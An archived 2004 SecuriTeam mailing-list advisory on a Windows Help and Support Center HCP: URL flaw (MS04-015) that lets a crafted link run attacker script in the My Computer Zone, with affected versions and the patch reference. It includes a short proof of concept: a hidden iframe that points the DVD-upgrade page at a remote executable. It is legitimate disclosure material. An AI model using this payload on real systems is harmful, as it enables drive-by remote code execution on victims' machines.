[NT] Windows Help Center Command Execution (Technical Details, HSC, Dvdupgrade)

From: SecuriTeam (support_at_securiteam.com)
Date: 05/12/04

  • Next message: SecuriTeam: "[NT] Vulnerability in Help and Support Center Remote Code Execution (MS04-015)"
    To: list@securiteam.com
    Date: 12 May 2004 19:02:26 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Windows Help Center Command Execution (Technical Details, HSC, Dvdupgrade)
    ------------------------------------------------------------------------

    SUMMARY

    "Help and Support Center (HSC) is a feature in Windows that provides help
    on a variety of topics" It can also be accessed via HCP: URLs. HSC is
    installed by default on Windows XP and Windows Server 2003 systems.

    An input invalidation vulnerability in HSC exposes users to a remote code
    execution vulnerability. An attacker could use this vulnerability to run
    arbitrary code whenever the victim opens a specially formatted HCP: URL.
    The user may be automatically directed to such URL whenever he visits a
    particular web page. The issue can be also be exploited via an e-mail.

    DETAILS

    Vulnerable Systems:
     * Microsoft Windows XP and Microsoft Windows XP Service Pack 1
     * Microsoft Windows XP 64-Bit Edition Service Pack 1
     * Microsoft Windows XP 64-Bit Edition Version 2003
     * Microsoft Windows Server 2003
     * Microsoft Windows Server 2003 64-Bit Edition

    The HSC installation contains various HTML and javascript files,which are
    intended to be used by HSC's internal use. The HTML files belong in the My
    Computer Zone because they require e.g. the ability to launch external
    helper programs with JavaScript.

    By using a specialy crafted url an attacker can cause the users local
    machine to start and render helpctr.exe in the local context and passes
    the injected url to the application. The user is then presented with the
    Help and Support DvD Upgrade dialog in Help and Support Center.

    With the Dvdupgrade page, The injected url is now linked to the "upgrade
    now" button. By pressing the updrade now button, the user is presented
    with a (open) / (save) dialog box with the offending ( attackers ) file.

    This allows an attacker to initiate the Dvdupgrade action on HSC, inject
    JavaScript code which will be run in the context of these HTML files,
    speciffically "HCP://system/DVDUpgrd/dvdupgrd.htm". In this way the
    attacker can run scripts in the My Computer Zone, which can e.g. download
    an start an attacker-supplied EXE program.

    As an aside, no url activity is displayed and there is no address or
    status bar for Help and Support.

    Solution:
    Microsoft was contacted on March 18th, 2004. A patch has been produced to
    correct the vulnerability. They have issued the
    following advisory:
    <http://www.microsoft.com/technet/security/bulletin/ms04-015.mspx>
    http://www.microsoft.com/technet/security/bulletin/ms04-015.mspx

    Proof of Concept:
    < iframe
    src="HCP://system/DVDUpgrd/dvdupgrd.htm?website=exploitlabs.com/msnspoof/poc/dvdupgd/dvdupgd.exe" width="1" height="1">
    </iframe>

    http://exploitlabs.com/msnspoof/poc/
    http://exploitlabs.com/msnspoof/poc/index2.html
    http://exploitlabs.com/msnspoof/poc/index3.jpg

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:security@exploitlabs.com>
    Donnie Werner of exploitlabs.

    The original article can be found at:
    <http://exploitlabs.com/files/advisories/EXPL-A-2003-027-helpctr.txt>
    http://exploitlabs.com/files/advisories/EXPL-A-2003-027-helpctr.txt

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[NT] Vulnerability in Help and Support Center Remote Code Execution (MS04-015)"

    Relevant Pages

    • [NT] Microsoft Windows Graphics Device Interface Integer Overflow Vulnerability (MS08-071)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Microsoft Windows Graphics Device Interface Integer Overflow Vulnerability ... Exploitation allows an attacker to execute arbitrary code with the ... targeted user to view a specially crafted image file. ...
      (Securiteam)
    • [NEWS] @Mail Web Interface Multiple Security Vulnerabilities
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... attacker to point it to mailbox of any registered user in @Mail system. ... Vulnerability 2: SQL database install - Multiple SQL Injection ...
      (Securiteam)
    • [NT] EMC Legato Networker DoS and Multiple Buffer Overflows
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... EMC Legato Networker DoS and Multiple Buffer Overflows ... The vulnerability specifically exists due to improper handling of ... is sent by an attacker, it is possible to overwrite portions of heap ...
      (Securiteam)
    • [EXPL] Windows RRAS Stack Overflow (Exploit, MS06-025)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... There is a remote code execution vulnerability in the Routing and Remote ... Microsoft Windows XP Service Pack 1 and Microsoft Windows XP Service ...
      (Securiteam)
    • [UNIX] IBM Informix Dynamic Server DBLANG Directory Traversal Vulnerability
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... IBM Informix Dynamic Server DBLANG Directory Traversal Vulnerability ... Local exploitation of a directory traversal vulnerability in IBM Corp.'s ... attacker can cause set-uid binaries to use Native Language Support ...
      (Securiteam)